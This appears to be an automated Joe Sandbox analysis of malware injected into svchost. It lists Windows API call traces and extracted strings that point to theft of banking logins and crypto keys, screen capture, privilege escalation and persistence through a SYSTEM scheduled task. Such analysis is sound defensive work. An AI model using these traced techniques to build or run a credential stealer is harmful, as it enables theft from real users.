                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocateCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                                • String ID: &LOGIN_AUTHORIZATION_CODE=$617D731E$617D73CA$617d7242$617d72c4$617d73f8$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 02BC2AAC
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2AC5
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC2ACC
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02BC2B0B
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2B25
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC2B2F
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02BC2BA8
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC2BCE
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC2BED
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,02BFFB50,00000000), ref: 02BC2C0F
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC2C2A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC2C35
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02BC2C52
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02BC2C84
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC2C8B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC2C9F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02BC2D40
                                                                                                                                                                                                                • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02BC2D51
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02BC2D61
                                                                                                                                                                                                                • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02BC2D72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D7B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC2D82
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D8F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC2D96
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DB1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC2DB4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DC1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC2DC4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC2DE1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC2DF3
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB50), ref: 02BC2DFE
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC2E39
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E48
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02BC2E5B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E68
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                                • String ID: 9E938D2Aa$9e938de8a$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                                • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                  • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                  • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • p=5w, xrefs: 0040394B
                                                                                                                                                                                                                • <Actions , xrefs: 0040380A
                                                                                                                                                                                                                • 00-->, xrefs: 0040383F
                                                                                                                                                                                                                • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                                • task%d, xrefs: 0040365C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=5w$task%d
                                                                                                                                                                                                                • API String ID: 1601901853-2340070504
                                                                                                                                                                                                                • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                                • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 02BC2053
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BC2064
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 02BC2079
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BC208E
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 02BC20A8
                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02BC20D6
                                                                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 02BC20EC
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32 ref: 02BC215C
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 02BC216F
                                                                                                                                                                                                                • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02BC218C
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02BC255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC21A6
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC21CD
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC21EF
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(02BC255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02BC2209
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC2214
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC223C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 02BC224C
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02BC2260
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02BC2270
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC227F
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 02BC228F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02BC22A3
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 02BC22B3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC22CC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BC22DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02BC22EE
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BC22FD
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 02BC2308
                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 02BC230F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC2323
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC2335
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02BC2340
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 02BC234C
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 02BC2358
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorHandleObjectPointerTokenWrite$CloseCompatibleCurrentFreeOpenProcessReleaseThread$AdjustAllocBitmapBitsConvertCursorDeleteErrorInfoInformationLastLocalLookupNamedPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                                • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 532523266-808120212
                                                                                                                                                                                                                • Opcode ID: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                                • Instruction ID: 7ccd0a5ff0d4d5a762415c6fb49a14866f6acfd14a00cb9e85bb6be09aae408b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6914BB2545300AFE3609F64DC88EABBBECEFC8785F508A1DF68597240D7709905CB62
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242), ref: 02BCF9E8
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA29
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCFA2F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCFA37
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02C0DDC8), ref: 02BCFA46
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCFA4D
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA89
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(02C0DDC8), ref: 02BCFA94
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242,?,?), ref: 02BCFAD6
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB11
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCFB17
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCFB1F
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB2E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCFB35
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB63
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCFB69
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCFB71
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB80
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCFB87
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BCFB91
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCFBC7
                                                                                                                                                                                                                • SHFileOperationA.SHELL32(?), ref: 02BCFC41
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BCFC52
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 02BCFC6F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCFC76
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCFC88
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCFC98
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCAA
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BCFCAD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCBA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BCFCBD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                                • String ID: 617d7242$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\*.bk$keys\$path.txt
                                                                                                                                                                                                                • API String ID: 959110331-3906905890
                                                                                                                                                                                                                • Opcode ID: d450f5d114425089414d17ae63550c45a8d571160d3a536aae205eaa31b849b0
                                                                                                                                                                                                                • Instruction ID: 5e8e7231d5f322158e474f43c9312e40ee0a3bcf937641c87bc4bef6abcdcdc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d450f5d114425089414d17ae63550c45a8d571160d3a536aae205eaa31b849b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE91F730E407469FEB214F78A858BABBFE5EF4A740F6485DAE986D7340DB708510C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: IsUserAnAdmin.SHELL32 ref: 02BB7C8A
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CC1
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CD9
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7556F380), ref: 02BB7CFB
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7556F380), ref: 02BB7D21
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7556F380), ref: 02BB7DAD
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7556F380), ref: 02BB7DB4
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8105
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BB8112
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8124
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB812D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB8145
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB8157
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8162
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8165
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8172
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8175
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8182
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8185
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8192
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8195
                                                                                                                                                                                                                • SetCaretBlinkTime.USER32(000000FF), ref: 02BB81A7
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 02BB81D5
                                                                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,9E938F5Ca,9e938fdda), ref: 02BB8205
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8215
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8218
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8225
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8228
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8235
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8238
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8245
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8248
                                                                                                                                                                                                                • Sleep.KERNEL32(00001388,9E938F5Ca,9e938fdda), ref: 02BB8253
                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 02BB8285
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 02BB82A5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB82BD
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB82CF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB82F2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB830C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                                • String ID: 9E938F5Ca$9e938fdda$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                                • API String ID: 2871222221-3108295826
                                                                                                                                                                                                                • Opcode ID: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                                • Instruction ID: 831aca38907dfe62bddd1553c83d58595776b516f6e71ab4e18650b822dc7f69
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D351E331A817016BE7726B749C4CFBB376DEF44B95F444A94FA599B180DBB0C810CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCC86F
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCC8A7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCC8E7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCC8F1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCC8F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCC90A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCC911
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,crypto), ref: 02BCC923
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.cer), ref: 02BCC936
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.pub), ref: 02BCC947
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCC992
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCC99F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 617D73AC$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                                • API String ID: 3980609930-448518846
                                                                                                                                                                                                                • Opcode ID: 88a3b16cb252b112502ad104c6c1ad0ab3ffa2c05d36c228e01ece7a1434c6e6
                                                                                                                                                                                                                • Instruction ID: 095c5035698c4be66ea2500776de022db699ea355080c5e341bc2693ee7e40a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88a3b16cb252b112502ad104c6c1ad0ab3ffa2c05d36c228e01ece7a1434c6e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10917631D402099FDB26CB789858BEA7FE8EF59740F2445DEEA4ED7240DB709944CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCEB4E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4), ref: 02BCEB7A
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCEBBD
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCEBC3
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCEBCB
